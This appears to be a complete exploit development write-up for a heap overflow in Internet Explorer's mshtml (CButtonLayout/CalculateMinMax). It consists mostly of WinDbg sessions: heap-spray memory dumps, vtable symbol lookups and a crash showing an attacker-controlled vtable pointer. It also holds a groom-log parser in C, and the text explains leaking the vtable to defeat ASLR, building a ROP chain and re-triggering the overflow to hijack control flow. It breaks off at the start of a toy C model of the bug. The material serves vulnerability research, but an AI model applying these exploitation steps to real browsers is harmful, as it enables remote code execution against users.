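    "03f2ae30 fa 00 00 00 45 00 45 00-45 00 45 00 45 00 45 00 ....E.E.E.E.E.E.\n"
    "vulheap\n"
    "0041da18  00001004 00001004 00001004 00000000\n"
    "vulheap\n"
    "03f2ae30  00001004 00001004 00001004 00000000\n";

static groom_log_t parse_sample(void) { groom_log_t g; parse_groom_log(SAMPLE_LOG, &g); return g; }
static int sample_reuses_freed_slot(void) { groom_log_t g = parse_sample(); return vulheap_in_freed_slot(&g); }

int main(void)
{
    groom_log_t g = parse_sample();
    printf("%d freed blocks logged, last vulheap at %08x, reused a freed slot: %s\n",
           g.nfreed, g.vulheap, vulheap_in_freed_slot(&g) ? "yes" : "no");
    return 0;
}
```

To use it on a real session, replace SAMPLE_LOG with the contents of the file written by .logopen; lines that are not one of the two markers (module loads, exception reports such as the stack overflow above) are ignored.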
To determine the vtable offset, just look it up dynamically:
0:005> x mshtml!CButtonLayout::*
6956f069 mshtml!CButtonLayout::GetThemeClassId (<no parameter info>)
695ee9c5 mshtml!CButtonLayout::GetInsets (<no parameter info>)
69508690 mshtml!CButtonLayout::`vftable' = <no type information>
6959cf35 mshtml!CButtonLayout::GetAutoSize (<no parameter info>)
69785a7c mshtml!CButtonLayout::HitTestContent (<no parameter info>)
6955d2e3 mshtml!CButtonLayout::DrawClientBackground (<no parameter info>)
69509211 mshtml!CButtonLayout::Init (<no parameter info>)
6959cf35 mshtml!CButtonLayout::GetMultiLine (<no parameter info>)
696f1080 mshtml!CButtonLayout::s_layoutdesc = <no type information>
69785a6c mshtml!CButtonLayout::GetBtnHelper (<no parameter info>)
697858a7 mshtml!CButtonLayout::GetFocusShape (<no parameter info>)
696f1079 mshtml!CButtonLayout::GetLayoutDesc (<no parameter info>)
69785a07 mshtml!CButtonLayout::DoLayout (<no parameter info>)
6956f069 mshtml!CButtonLayout::GetWordWrap (<no parameter info>)
695084f8 mshtml!CButtonLayout::`vftable' = <no type information>
6955d2af mshtml!CButtonLayout::DrawClient (<no parameter info>)
695d36c1 mshtml!CButtonLayout::`scalar deleting destructor' (<no parameter info>)
697856e7 mshtml!CButtonLayout::DrawClientBorder (<no parameter info>)
695d36c1 mshtml!CButtonLayout::`vector deleting destructor' (<no parameter info>)
695eeb59 mshtml!CButtonLayout::GetDefaultSize (<no parameter info>)
Oddly, there are two vtables; I do not know why.
Here is vulheap and the memory after it. The 04 10 00 00 dwords are the 41*100 = 0x1004 width records, and further down the fa 00 00 00 dword (0xFA, the length prefix of a 125-character BSTR) followed by the B.B.B. run is one of the sprayed strings:
1:026> db 03f2ae30 l101c
03f2ae30 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2ae40 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2ae50 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2ae60 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2ae70 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2ae80 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2ae90 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2aea0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2aeb0 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2aec0 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2aed0 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2aee0 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2aef0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2af00 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2af10 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2af20 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2af30 04 10 00 00 04 10 00 00-0c 61 81 04 00 00 00 00 .........a......
03f2af40 02 00 00 00 48 00 01 00-04 10 00 00 04 10 00 00 ....H...........
03f2af50 04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A.
03f2af60 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2af70 41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00 A.A.A.A.A.A.H...
03f2af80 04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00 ............A.A.
03f2af90 41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00 A.A.A.A.H.......
03f2afa0 04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00 ........A.A.A.A.
03f2afb0 41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00 A.A.H...........
03f2afc0 04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A.
03f2afd0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2afe0 41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00 A.A.A.A.A.A.H...
03f2aff0 04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00 ............A.A.
03f2b000 41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00 A.A.A.A.H.......
03f2b010 04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00 ........A.A.A.A.
03f2b020 41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00 A.A.H...........
03f2b030 04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A.
03f2b040 48 00 01 00 41 00 00 00-20 10 d1 01 00 00 00 c2 H...A... .......
03f2b050 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2b060 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2b070 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b080 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b090 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0a0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0b0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0c0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0d0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0e0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0f0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b100 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b110 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b120 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b130 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b140 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b150 42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00 B.B.B.B.B.B.B...
03f2b160 05 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00 .........j......
03f2b170 02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01 .........:.h..7.
03f2b180 70 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00 p....<.h........
03f2b190 09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00 ................
03f2b1a0 00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff ................
03f2b1b0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b1c0 00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00 ....$... .......
03f2b1d0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b1e0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b1f0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b200 00 00 00 00 00 00 00 00-00 00 00 00 28 b2 f2 03 ............(...
03f2b210 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b220 01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b230 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b240 ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff ................
03f2b250 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b260 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b270 00 00 00 00 00 00 00 00-66 10 d1 01 00 00 00 c2 ........f.......
03f2b280 a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05 .0..............
03f2b290 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b2a0 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b2b0 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b2c0 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b2d0 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2b2e0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b2f0 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b300 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b310 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b320 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b330 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b340 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2b350 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b360 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b370 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b380 45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00 E.E.A.E.H...E...
03f2b390 5b 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00 [........a......
03f2b3a0 02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00 ............A.A.
03f2b3b0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3c0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b400 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b410 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b420 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b430 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b440 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b450 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b460 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b470 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b480 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b490 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b4a0 41 00 41 00 41 00 00 00-bc 10 d1 01 00 00 00 c2 A.A.A...........
03f2b4b0 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2b4c0 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2b4d0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b4e0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b4f0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b500 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b510 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b520 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b530 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b540 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b550 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b560 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b570 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b580 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b590 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b5a0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b5b0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00 B.B.B.B.B.B.B...
03f2b5c0 91 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00 .........j......
03f2b5d0 02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01 .........:.h..7.
03f2b5e0 e0 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00 .....<.h........
03f2b5f0 09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00 ................
03f2b600 00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff ................
03f2b610 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b620 00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00 ....$... .......
03f2b630 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b640 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b650 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b660 00 00 00 00 00 00 00 00-00 00 00 00 88 b6 f2 03 ................
03f2b670 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b680 01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b690 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b6a0 ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff ................
03f2b6b0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b6c0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b6d0 00 00 00 00 00 00 00 00-f2 10 d1 01 00 00 00 c2 ................
03f2b6e0 a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05 .0..............
03f2b6f0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b700 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b710 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b720 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b730 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2b740 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b750 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b760 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b770 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b780 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b790 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b7a0 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2b7b0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b7c0 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b7d0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b7e0 45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00 E.E.A.E.H...E...
03f2b7f0 d7 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00 .........a......
03f2b800 02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00 ............A.A.
03f2b810 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b820 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b830 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b840 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b850 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b860 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b870 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b880 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b890 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8a0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8b0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8c0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b900 41 00 41 00 41 00 00 00-08 11 d1 01 00 00 00 c2 A.A.A...........
03f2b910 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2b920 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2b930 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b940 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b950 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b960 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b970 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b980 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b990 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9a0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9b0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9c0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9d0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9e0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9f0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2ba00 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2ba10 42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00 B.B.B.B.B.B.B...
03f2ba20 6d 11 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00 m........j......
03f2ba30 02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01 .........:.h..7.
03f2ba40 50 91 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00 P....<.h........
03f2ba50 09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00 ................
03f2ba60 00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff ................
03f2ba70 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2ba80 00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00 ....$... .......
03f2ba90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2baa0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bab0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bac0 00 00 00 00 00 00 00 00-00 00 00 00 e8 ba f2 03 ................
03f2bad0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bae0 01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................
03f2baf0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bb00 ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff ................
03f2bb10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bb20 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bb30 00 00 00 00 00 00 00 00-4e 11 d1 01 00 00 00 c2 ........N.......
03f2bb40 a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05 .0..............
03f2bb50 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2bb60 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2bb70 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2bb80 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2bb90 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2bba0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2bbb0 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2bbc0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2bbd0 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2bbe0 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2bbf0 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2bc00 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2bc10 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2bc20 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2bc30 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2bc40 45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00 E.E.A.E.H...E...
03f2bc50 a3 11 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00 .........a......
03f2bc60 02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00 ............A.A.
03f2bc70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bc80 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bc90 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bca0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcb0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcc0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcd0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bce0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcf0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd50 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd60 41 00 41 00 41 00 00 00-84 11 d1 01 00 00 00 c2 A.A.A...........
03f2bd70 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2bd80 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2bd90 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bda0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdb0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdc0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdd0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bde0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdf0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be00 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be10 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be20 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be30 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be40 42 00 42 00 42 00 42 00-42 00 42 00 B.B.B.B.B.B.
It is easy to see that the AAAA string at 03f2ae30 has been overwritten in bulk, so that block is the vulnerable heap buffer (vulheap). Note that 03f2ae30 is the address observed in this debugging session; it will differ between runs, and what the exploit relies on is the predictable layout of the sprayed strings, not the absolute address. Once the vtable address has been obtained, compute the mshtml base address from it and build the ROP chain. Then trigger the overflow a second time; this time the overflow is sized exactly like the run that just overwrote the BBBB string, so that it lands directly on the vtable pointer. The vtable pointer can therefore be hijacked to an arbitrary address, as follows:
(6cc.7f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07070024 ---> controlled vtable pointer ebx=01000000 ecx=040f8910 edx=00000041 esi=0375f530 edi=040e0790
eip=003d006b esp=0375f368 ebp=0375f3a0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
003d006b 777a ja 003d00e7 [br=1]
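The two stages described above, first inflating the string's length field so that reading it back exposes the following object's vtable pointer, then overflowing once more to land exactly on that pointer, in a self-contained C model. This is an added example, not mshtml code and not the original post's exploit: the arena layout, the 8-byte column record, the offsets and every address (FAKE_VTABLE_VA, FAKE_VTABLE_RVA, ATTACKER_TARGET) are constructed for illustration, the length-field leak is the standard approach for this bug and an assumption of the example rather than something this excerpt spells out, and the clamped loop in patched_min_max is a generic hardening, not Microsoft's actual fix. Addresses are 32-bit, as on the Win7 x86 target used in the analysis.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example: a toy model of the CalculateMinMax bug class. Not IE code.
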